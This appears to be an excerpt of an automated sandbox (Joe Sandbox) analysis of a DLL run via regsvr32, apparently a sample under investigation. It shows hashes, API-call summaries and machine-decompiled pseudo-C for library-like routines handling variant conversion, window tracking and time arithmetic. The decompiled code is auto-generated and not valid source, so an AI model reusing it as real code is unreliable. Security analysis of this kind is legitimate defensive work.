                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1487844433-4125583295
                                                                                                            • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                                                            • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ECE8 Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011BF0(0x1003b04c, _t327);
				_t155 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E10010592(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x10040908;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E10006B11(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010578(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010578(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010578(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000E754(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010578(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E100014B0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010578(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010578(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}



































                                                                                                            0x1000ece8
                                                                                                            0x1000eced
                                                                                                            0x1000ecf8
                                                                                                            0x1000ecff
                                                                                                            0x1000ed0b
                                                                                                            0x1000ed0e
                                                                                                            0x1000ed13
                                                                                                            0x1000ed1f
                                                                                                            0x1000ed22
                                                                                                            0x1000ed27
                                                                                                            0x1000ed2b
                                                                                                            0x1000ed46
                                                                                                            0x1000ed4f
                                                                                                            0x1000ed5a
                                                                                                            0x1000ed5a
                                                                                                            0x1000ed5e
                                                                                                            0x1000ed69
                                                                                                            0x1000ed6b
                                                                                                            0x1000efec
                                                                                                            0x1000efec
                                                                                                            0x1000eff1
                                                                                                            0x00000000
                                                                                                            0x1000eff7
                                                                                                            0x1000eff7
                                                                                                            0x1000eff7
                                                                                                            0x1000eff8
                                                                                                            0x1000f14b
                                                                                                            0x1000f150
                                                                                                            0x1000f152
                                                                                                            0x1000f158
                                                                                                            0x1000f15b
                                                                                                            0x1000f15e
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f163
                                                                                                            0x1000f163
                                                                                                            0x1000f160
                                                                                                            0x1000f16b
                                                                                                            0x1000f16e
                                                                                                            0x1000f170
                                                                                                            0x1000f172
                                                                                                            0x1000f174
                                                                                                            0x1000f174
                                                                                                            0x1000f176
                                                                                                            0x1000f179
                                                                                                            0x1000f186
                                                                                                            0x1000f18a
                                                                                                            0x1000f18f
                                                                                                            0x00000000
                                                                                                            0x1000f18f
                                                                                                            0x1000effe
                                                                                                            0x1000efff
                                                                                                            0x1000efff
                                                                                                            0x1000f000
                                                                                                            0x1000f0ef
                                                                                                            0x1000f0f4
                                                                                                            0x1000f0f6
                                                                                                            0x1000f100
                                                                                                            0x1000f106
                                                                                                            0x1000f116
                                                                                                            0x1000f119
                                                                                                            0x1000f11e
                                                                                                            0x1000f127
                                                                                                            0x1000f131
                                                                                                            0x1000f135
                                                                                                            0x1000f13a
                                                                                                            0x00000000
                                                                                                            0x1000f13a
                                                                                                            0x1000f006
                                                                                                            0x1000f006
                                                                                                            0x1000f006
                                                                                                            0x1000f007
                                                                                                            0x1000f08d
                                                                                                            0x1000f092
                                                                                                            0x1000f094
                                                                                                            0x1000f09e
                                                                                                            0x1000f0a1
                                                                                                            0x1000f0b1
                                                                                                            0x1000f0b4
                                                                                                            0x1000f0b9
                                                                                                            0x1000f0c5
                                                                                                            0x1000f0d5
                                                                                                            0x1000f0d9
                                                                                                            0x1000f0de
                                                                                                            0x00000000
                                                                                                            0x1000f0de
                                                                                                            0x1000f009
                                                                                                            0x1000f009
                                                                                                            0x1000f00a
                                                                                                            0x1000f019
                                                                                                            0x1000f01e
                                                                                                            0x1000f020
                                                                                                            0x1000f04a
                                                                                                            0x1000f04f
                                                                                                            0x1000f05a
                                                                                                            0x1000f06a
                                                                                                            0x1000f06e
                                                                                                            0x1000f073
                                                                                                            0x00000000
                                                                                                            0x1000f073
                                                                                                            0x1000f020
                                                                                                            0x1000f00a
                                                                                                            0x1000f007
                                                                                                            0x1000f000
                                                                                                            0x1000eff8
                                                                                                            0x1000ed71
                                                                                                            0x1000ed71
                                                                                                            0x1000efb5
                                                                                                            0x1000efc5
                                                                                                            0x1000efc9
                                                                                                            0x1000efd2
                                                                                                            0x1000efd6
                                                                                                            0x1000efe2
                                                                                                            0x1000efe4
                                                                                                            0x00000000
                                                                                                            0x1000ed77
                                                                                                            0x1000ed77
                                                                                                            0x1000ed7a
                                                                                                            0x1000ee87
                                                                                                            0x1000ee8a
                                                                                                            0x1000ef8a
                                                                                                            0x1000ef93
                                                                                                            0x1000ef97
                                                                                                            0x1000ef9c
                                                                                                            0x00000000
                                                                                                            0x1000ee90
                                                                                                            0x1000ee90
                                                                                                            0x1000ee93
                                                                                                            0x1000ef57
                                                                                                            0x1000ef60
                                                                                                            0x1000ef64
                                                                                                            0x1000ef69
                                                                                                            0x00000000
                                                                                                            0x1000ee99
                                                                                                            0x1000ee99
                                                                                                            0x1000ee9c
                                                                                                            0x1000eea2
                                                                                                            0x1000eea5
                                                                                                            0x1000ef1e
                                                                                                            0x1000ef25
                                                                                                            0x1000ef2b
                                                                                                            0x1000ef35
                                                                                                            0x1000ef39
                                                                                                            0x1000ef3e
                                                                                                            0x00000000
                                                                                                            0x1000eea7
                                                                                                            0x1000eea7
                                                                                                            0x1000eeaa
                                                                                                            0x00000000
                                                                                                            0x1000eeac
                                                                                                            0x1000eeac
                                                                                                            0x1000eeaf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000eeaf
                                                                                                            0x1000eeaa
                                                                                                            0x1000eea5
                                                                                                            0x1000ee9c
                                                                                                            0x1000ee93
                                                                                                            0x1000ed80
                                                                                                            0x1000ed80
                                                                                                            0x1000f197
                                                                                                            0x1000f1a5
                                                                                                            0x1000f1b5
                                                                                                            0x1000f1b9
                                                                                                            0x1000f1c2
                                                                                                            0x1000f1c6
                                                                                                            0x1000f1d2
                                                                                                            0x1000f1d4
                                                                                                            0x1000f1d7
                                                                                                            0x1000f1d7
                                                                                                            0x1000f1da
                                                                                                            0x1000f1dd
                                                                                                            0x1000ed86
                                                                                                            0x1000ed87
                                                                                                            0x1000ed87
                                                                                                            0x1000ed88
                                                                                                            0x1000eee6
                                                                                                            0x1000eefc
                                                                                                            0x1000ef05
                                                                                                            0x1000ef09
                                                                                                            0x1000ef0e
                                                                                                            0x00000000
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8f
                                                                                                            0x1000eeb5
                                                                                                            0x1000eec9
                                                                                                            0x1000eed2
                                                                                                            0x1000eed6
                                                                                                            0x1000eedb
                                                                                                            0x00000000
                                                                                                            0x1000ed95
                                                                                                            0x1000ed95
                                                                                                            0x1000ed95
                                                                                                            0x1000ed96
                                                                                                            0x1000ee5a
                                                                                                            0x1000ee60
                                                                                                            0x1000ee73
                                                                                                            0x1000ee77
                                                                                                            0x1000ee7c
                                                                                                            0x00000000
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9d
                                                                                                            0x1000ee21
                                                                                                            0x1000ee27
                                                                                                            0x1000ee3a
                                                                                                            0x1000ee3e
                                                                                                            0x1000ee43
                                                                                                            0x00000000
                                                                                                            0x1000ed9f
                                                                                                            0x1000ed9f
                                                                                                            0x1000ed9f
                                                                                                            0x1000eda0
                                                                                                            0x1000ede7
                                                                                                            0x1000edf1
                                                                                                            0x1000edf7
                                                                                                            0x1000edfa
                                                                                                            0x1000ee04
                                                                                                            0x1000ee08
                                                                                                            0x1000ee0d
                                                                                                            0x00000000
                                                                                                            0x1000eda2
                                                                                                            0x1000eda2
                                                                                                            0x1000eda3
                                                                                                            0x1000edb5
                                                                                                            0x1000edbb
                                                                                                            0x1000edce
                                                                                                            0x1000edd2
                                                                                                            0x1000edd7
                                                                                                            0x1000f079
                                                                                                            0x1000f07a
                                                                                                            0x1000f07d
                                                                                                            0x1000f07d
                                                                                                            0x1000eda3
                                                                                                            0x1000eda0
                                                                                                            0x1000ed9d
                                                                                                            0x1000ed96
                                                                                                            0x1000ed8f
                                                                                                            0x1000ed88
                                                                                                            0x1000ed80
                                                                                                            0x1000ed7a
                                                                                                            0x1000ed71
                                                                                                            0x1000f1e9
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1fc
                                                                                                            0x1000f20d

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                            • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                              • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2075586698-0
                                                                                                            • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                                                            • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                              • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                                                              • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                                                              • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                              • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                              • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                              • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • GetWindowRect.USER32 ref: 10030BDC
                                                                                                              • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                              • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • GetWindowRect.USER32 ref: 10030CA6
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                                                              • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                                                              • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                                                              • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                                                              • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                                                            • GetWindowRect.USER32 ref: 10030D79
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2136250054-0
                                                                                                            • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                                                            • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
